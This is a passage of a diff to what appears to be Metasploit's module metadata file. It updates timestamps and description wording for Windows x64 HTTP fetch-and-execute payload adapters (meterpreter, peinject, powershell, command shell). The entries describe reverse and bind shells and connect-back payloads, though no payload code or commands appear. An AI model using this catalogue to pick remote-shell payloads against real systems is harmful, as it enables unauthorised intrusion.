"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -201258,7 +201619,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-07-31 16:38:09 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/http/x64/meterpreter/reverse_named_pipe",
|
||||
@@ -201291,7 +201652,7 @@
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an http server.\n\nConnect back to the attacker (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTP server.\nConnect back to the attacker (Windows x64)",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -201302,7 +201663,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-07-31 16:38:09 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/http/x64/meterpreter/reverse_tcp",
|
||||
@@ -201339,7 +201700,7 @@
|
||||
"max3raza",
|
||||
"RageLtMan"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an http server.\n\nConnect back to the attacker",
|
||||
"description": "Fetch and execute an x64 payload from an HTTP server.\nConnect back to the attacker",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -201350,7 +201711,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-07-31 16:38:09 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/http/x64/meterpreter/reverse_tcp_rc4",
|
||||
@@ -201383,7 +201744,7 @@
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an http server.\n\nConnect back to the attacker with UUID Support (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTP server.\nConnect back to the attacker with UUID Support (Windows x64)",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -201394,7 +201755,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-07-31 16:38:09 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/http/x64/meterpreter/reverse_tcp_uuid",
|
||||
@@ -201427,7 +201788,7 @@
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an http server.\n\nTunnel communication over HTTP (Windows x64 winhttp)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTP server.\nTunnel communication over HTTP (Windows x64 winhttp)",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -201438,7 +201799,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-07-31 16:38:09 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/http/x64/meterpreter/reverse_winhttp",
|
||||
@@ -201471,7 +201832,7 @@
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an http server.\n\nTunnel communication over HTTPS (Windows x64 winhttp)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTP server.\nTunnel communication over HTTPS (Windows x64 winhttp)",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -201482,7 +201843,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-07-31 16:38:09 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/http/x64/meterpreter/reverse_winhttps",
|
||||
@@ -201515,7 +201876,7 @@
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an http server.\n\nConnect to victim and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.",
|
||||
"description": "Fetch and execute an x64 payload from an HTTP server.\nConnect to victim and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -201526,7 +201887,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-07-31 16:38:09 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/http/x64/meterpreter_bind_named_pipe",
|
||||
@@ -201556,7 +201917,7 @@
|
||||
"OJ Reeves",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an http server.\n\nConnect to victim and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.",
|
||||
"description": "Fetch and execute an x64 payload from an HTTP server.\nConnect to victim and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -201567,7 +201928,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-07-31 16:38:09 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/http/x64/meterpreter_bind_tcp",
|
||||
@@ -201597,7 +201958,7 @@
|
||||
"OJ Reeves",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an http server.\n\nConnect back to attacker and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.",
|
||||
"description": "Fetch and execute an x64 payload from an HTTP server.\nConnect back to attacker and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -201608,7 +201969,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-07-31 16:38:09 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/http/x64/meterpreter_reverse_http",
|
||||
@@ -201638,7 +201999,7 @@
|
||||
"OJ Reeves",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an http server.\n\nConnect back to attacker and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.",
|
||||
"description": "Fetch and execute an x64 payload from an HTTP server.\nConnect back to attacker and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -201649,7 +202010,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-07-31 16:38:09 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/http/x64/meterpreter_reverse_https",
|
||||
@@ -201679,7 +202040,7 @@
|
||||
"OJ Reeves",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an http server.\n\nConnect back to attacker and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.",
|
||||
"description": "Fetch and execute an x64 payload from an HTTP server.\nConnect back to attacker and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -201690,7 +202051,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-07-31 16:38:09 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/http/x64/meterpreter_reverse_ipv6_tcp",
|
||||
@@ -201720,7 +202081,7 @@
|
||||
"OJ Reeves",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an http server.\n\nConnect back to attacker and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.",
|
||||
"description": "Fetch and execute an x64 payload from an HTTP server.\nConnect back to attacker and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -201731,7 +202092,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-07-31 16:38:09 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/http/x64/meterpreter_reverse_tcp",
|
||||
@@ -201761,7 +202122,7 @@
|
||||
"ege <egebalci@pm.me>",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an http server.\n\nListen for an IPv6 connection (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTP server.\nListen for an IPv6 connection (Windows x64)",
|
||||
"references": [
|
||||
"URL-https://github.com/EgeBalci/Amber"
|
||||
],
|
||||
@@ -201771,7 +202132,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-07-31 16:38:09 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/http/x64/peinject/bind_ipv6_tcp",
|
||||
@@ -201804,7 +202165,7 @@
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an http server.\n\nListen for an IPv6 connection with UUID Support (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTP server.\nListen for an IPv6 connection with UUID Support (Windows x64)",
|
||||
"references": [
|
||||
"URL-https://github.com/EgeBalci/Amber"
|
||||
],
|
||||
@@ -201814,7 +202175,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-07-31 16:38:09 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/http/x64/peinject/bind_ipv6_tcp_uuid",
|
||||
@@ -201846,7 +202207,7 @@
|
||||
"ege <egebalci@pm.me>",
|
||||
"UserExistsError"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an http server.\n\nListen for a pipe connection (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTP server.\nListen for a pipe connection (Windows x64)",
|
||||
"references": [
|
||||
"URL-https://github.com/EgeBalci/Amber"
|
||||
],
|
||||
@@ -201856,7 +202217,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-07-31 16:38:09 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/http/x64/peinject/bind_named_pipe",
|
||||
@@ -201888,7 +202249,7 @@
|
||||
"ege <egebalci@pm.me>",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an http server.\n\nListen for a connection (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTP server.\nListen for a connection (Windows x64)",
|
||||
"references": [
|
||||
"URL-https://github.com/EgeBalci/Amber"
|
||||
],
|
||||
@@ -201898,7 +202259,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-07-31 16:38:09 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/http/x64/peinject/bind_tcp",
|
||||
@@ -201935,7 +202296,7 @@
|
||||
"max3raza",
|
||||
"RageLtMan"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an http server.\n\nConnect back to the attacker",
|
||||
"description": "Fetch and execute an x64 payload from an HTTP server.\nConnect back to the attacker",
|
||||
"references": [
|
||||
"URL-https://github.com/EgeBalci/Amber"
|
||||
],
|
||||
@@ -201945,7 +202306,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-07-31 16:38:09 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/http/x64/peinject/bind_tcp_rc4",
|
||||
@@ -201978,7 +202339,7 @@
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an http server.\n\nListen for a connection with UUID Support (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTP server.\nListen for a connection with UUID Support (Windows x64)",
|
||||
"references": [
|
||||
"URL-https://github.com/EgeBalci/Amber"
|
||||
],
|
||||
@@ -201988,7 +202349,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-07-31 16:38:09 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/http/x64/peinject/bind_tcp_uuid",
|
||||
@@ -202020,7 +202381,7 @@
|
||||
"ege <egebalci@pm.me>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an http server.\n\nConnect back to the attacker via a named pipe pivot",
|
||||
"description": "Fetch and execute an x64 payload from an HTTP server.\nConnect back to the attacker via a named pipe pivot",
|
||||
"references": [
|
||||
"URL-https://github.com/EgeBalci/Amber"
|
||||
],
|
||||
@@ -202030,7 +202391,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-07-31 16:38:09 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/http/x64/peinject/reverse_named_pipe",
|
||||
@@ -202062,7 +202423,7 @@
|
||||
"ege <egebalci@pm.me>",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an http server.\n\nConnect back to the attacker (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTP server.\nConnect back to the attacker (Windows x64)",
|
||||
"references": [
|
||||
"URL-https://github.com/EgeBalci/Amber"
|
||||
],
|
||||
@@ -202072,7 +202433,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-07-31 16:38:09 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/http/x64/peinject/reverse_tcp",
|
||||
@@ -202109,7 +202470,7 @@
|
||||
"max3raza",
|
||||
"RageLtMan"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an http server.\n\nConnect back to the attacker",
|
||||
"description": "Fetch and execute an x64 payload from an HTTP server.\nConnect back to the attacker",
|
||||
"references": [
|
||||
"URL-https://github.com/EgeBalci/Amber"
|
||||
],
|
||||
@@ -202119,7 +202480,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-07-31 16:38:09 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/http/x64/peinject/reverse_tcp_rc4",
|
||||
@@ -202152,7 +202513,7 @@
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an http server.\n\nConnect back to the attacker with UUID Support (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTP server.\nConnect back to the attacker with UUID Support (Windows x64)",
|
||||
"references": [
|
||||
"URL-https://github.com/EgeBalci/Amber"
|
||||
],
|
||||
@@ -202162,7 +202523,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-07-31 16:38:09 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/http/x64/peinject/reverse_tcp_uuid",
|
||||
@@ -202193,7 +202554,7 @@
|
||||
"Brendan Watters",
|
||||
"bwatters-r7"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an http server.\n\nConnect back to attacker and report UUID (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTP server.\nConnect back to attacker and report UUID (Windows x64)",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -202203,7 +202564,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-07-31 16:38:09 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/http/x64/pingback_reverse_tcp",
|
||||
@@ -202234,7 +202595,7 @@
|
||||
"Dave Hardy",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an http server",
|
||||
"description": "Fetch and execute an x64 payload from an HTTP server.",
|
||||
"references": [
|
||||
"URL-https://blog.nettitude.com/uk/interactive-powershell-session-via-metasploit"
|
||||
],
|
||||
@@ -202244,7 +202605,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-07-31 16:38:09 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/http/x64/powershell_bind_tcp",
|
||||
@@ -202275,7 +202636,7 @@
|
||||
"Dave Hardy",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an http server",
|
||||
"description": "Fetch and execute an x64 payload from an HTTP server.",
|
||||
"references": [
|
||||
"URL-https://blog.nettitude.com/uk/interactive-powershell-session-via-metasploit"
|
||||
],
|
||||
@@ -202285,7 +202646,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-07-31 16:38:09 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/http/x64/powershell_reverse_tcp",
|
||||
@@ -202316,7 +202677,7 @@
|
||||
"Dave Hardy",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an http server",
|
||||
"description": "Fetch and execute an x64 payload from an HTTP server.",
|
||||
"references": [
|
||||
"URL-https://blog.nettitude.com/uk/interactive-powershell-session-via-metasploit"
|
||||
],
|
||||
@@ -202326,7 +202687,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-07-31 16:38:09 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/http/x64/powershell_reverse_tcp_ssl",
|
||||
@@ -202355,7 +202716,7 @@
|
||||
"Brendan Watters",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an http server.\n\nSpawn a piped command shell (Windows x64) (staged).\n\nListen for an IPv6 connection (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTP server.\nSpawn a piped command shell (Windows x64) (staged).\n\nListen for an IPv6 connection (Windows x64)",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -202365,7 +202726,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-07-31 16:38:09 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/http/x64/shell/bind_ipv6_tcp",
|
||||
@@ -202397,7 +202758,7 @@
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an http server.\n\nSpawn a piped command shell (Windows x64) (staged).\n\nListen for an IPv6 connection with UUID Support (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTP server.\nSpawn a piped command shell (Windows x64) (staged).\n\nListen for an IPv6 connection with UUID Support (Windows x64)",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -202407,7 +202768,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-07-31 16:38:09 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/http/x64/shell/bind_ipv6_tcp_uuid",
|
||||
@@ -202439,7 +202800,7 @@
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"UserExistsError"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an http server.\n\nSpawn a piped command shell (Windows x64) (staged).\n\nListen for a pipe connection (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTP server.\nSpawn a piped command shell (Windows x64) (staged).\n\nListen for a pipe connection (Windows x64)",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -202449,7 +202810,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-07-31 16:38:09 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/http/x64/shell/bind_named_pipe",
|
||||
@@ -202480,7 +202841,7 @@
|
||||
"Brendan Watters",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an http server.\n\nSpawn a piped command shell (Windows x64) (staged).\n\nListen for a connection (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTP server.\nSpawn a piped command shell (Windows x64) (staged).\n\nListen for a connection (Windows x64)",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -202490,7 +202851,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-07-31 16:38:09 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/http/x64/shell/bind_tcp",
|
||||
@@ -202526,7 +202887,7 @@
|
||||
"max3raza",
|
||||
"RageLtMan"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an http server.\n\nSpawn a piped command shell (Windows x64) (staged).\n\nConnect back to the attacker",
|
||||
"description": "Fetch and execute an x64 payload from an HTTP server.\nSpawn a piped command shell (Windows x64) (staged).\n\nConnect back to the attacker",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -202536,7 +202897,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-07-31 16:38:09 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/http/x64/shell/bind_tcp_rc4",
|
||||
@@ -202568,7 +202929,7 @@
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an http server.\n\nSpawn a piped command shell (Windows x64) (staged).\n\nListen for a connection with UUID Support (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTP server.\nSpawn a piped command shell (Windows x64) (staged).\n\nListen for a connection with UUID Support (Windows x64)",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -202578,7 +202939,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-07-31 16:38:09 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/http/x64/shell/bind_tcp_uuid",
|
||||
@@ -202609,7 +202970,7 @@
|
||||
"Brendan Watters",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an http server.\n\nSpawn a piped command shell (Windows x64) (staged).\n\nConnect back to the attacker (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTP server.\nSpawn a piped command shell (Windows x64) (staged).\n\nConnect back to the attacker (Windows x64)",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -202619,7 +202980,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-07-31 16:38:09 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/http/x64/shell/reverse_tcp",
